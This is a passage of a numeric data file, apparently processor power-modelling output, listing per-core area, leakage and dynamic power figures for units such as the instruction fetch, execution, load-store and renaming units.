'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.367117,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.635715,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.3646,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36743,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.36288,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.58889,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133083,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0962357,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.098423,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0962357,
'Execution Unit/Register Files/Runtime Dynamic': 0.111731,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.232545,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.699999,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.78723,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0025787,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0025787,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00228506,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000905925,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00141385,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00885632,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0233303,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0946165,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.01842,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.319883,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.32136,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.53349,
'Instruction Fetch Unit/Runtime Dynamic': 0.768047,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0724055,
'L2/Runtime Dynamic': 0.0203402,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.43171,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.56223,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.103353,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.103353,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.92175,
'Load Store Unit/Runtime Dynamic': 2.17528,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.25485,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.5097,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0904471,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0915305,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.374203,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0524519,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.689068,
'Memory Management Unit/Runtime Dynamic': 0.143982,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.3673,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0187724,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.195423,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.214196,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.10907,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.236481,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.381434,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.192535,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.81045,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.270466,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.35221,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00991905,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0717274,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0733575,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0717274,
'Execution Unit/Register Files/Runtime Dynamic': 0.0832765,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.15111,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.453276,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.95507,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00196549,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00196549,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00174907,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000697398,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00105379,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00673384,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0175185,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0705204,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.48571,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.237088,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.239519,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.92192,
'Instruction Fetch Unit/Runtime Dynamic': 0.57138,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0537837,
'L2/Runtime Dynamic': 0.0145847,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.58563,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.14772,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.07598,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.07598,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.94443,
'Load Store Unit/Runtime Dynamic': 1.5984,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.187354,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.374708,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0664924,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0672969,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.278905,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0388766,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.549236,
'Memory Management Unit/Runtime Dynamic': 0.106174,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.411,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0106693,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.123013,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.133683,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.37929,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
